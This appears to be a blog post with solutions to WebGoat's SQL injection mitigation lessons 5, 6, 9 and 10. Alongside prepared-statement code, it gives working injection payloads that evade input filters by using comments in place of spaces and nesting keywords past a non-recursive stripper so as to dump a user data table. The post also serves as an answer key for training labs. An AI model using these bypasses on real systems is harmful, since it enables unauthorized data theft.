Open in app

Sign in

Write

Sign in

WebGoat SQL injection mitigation lessons 5 6 9 10

PVXs
3 min readSep 10, 2020

A few quick lessons

WebGoat SQL injection mitigation lesson 5

All you need to know to solve this is somewhere between mitigation lessons 1 to 4, these are the solutions for the text fields, from top to bottom, from left to right.

getConnection
PreparedStatement statement
prepareStatement
?
?
statement.setString(1, name)
statement.setString(2, mail)

WebGoat SQL injection mitigation lesson 6

As for lesson 5, all you need to know is in the previous lessons, here’s my code for the solution.

try {
    Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW);
    PreparedStatement statement = conn.prepareStatement("SELECT status FROM users WHERE name=? AND mail=?");
    statement.setString(1, "name");
    statement.setString(2, "mail");
    statement.executeUpdate();
} catch (Exception e) {
    System.out.println("Oops. Something went wrong!");
}

WebGoat SQL injection mitigation lesson 9

This is a clone of WebGoat SQL injection advanced 3, by doing some quick tests we can see that the validation of the text field checks for spaces and does not permit them as input.

We can try to substitute spaces with comments.

/**/ <-- This is a comment in HSQLDBLet's try -> a'/**/or/**/'1'='1';--

From here, we can try the query we need to run to get all the rows for the ‘user_system_data’ table.

a';/**/select/**/*/**/from/**/user_system_data;--

a'/**/union/**/select/**/user_system_data.*,'1','1',1/**/from/**/user_system_data;--

WebGoat SQL injection mitigation lesson 10

By doing the solution queries as of lesson 9, we can see that the form validates for white spaces and for the ‘SELECT’ and ‘FORM’ keywords.

But if we try to nest a SELECT in a SELECT by typing SELSELECTECT, we can see that the validation removes the inner SELECT and leaves the outer SELECT untouched as it is not checking recursively for the SQL keywords.

/**/ <-- HSQLDB comment instead of white space
selselectect <-- instead of 'select'
frfromom <-- instead of 'from'

So my solution for lesson 10 is

a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--

This concludes WebGoat SQL injection mitigation 5 6 9 10.

I hope you liked it.

PVXs — https://twitter.com/pivixih

Infosec
Webgoat
Sql Injection
Solutions
Lessons

--

--

PVXs

Written by PVXs

104 Followers

IT Manager / Pentester

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams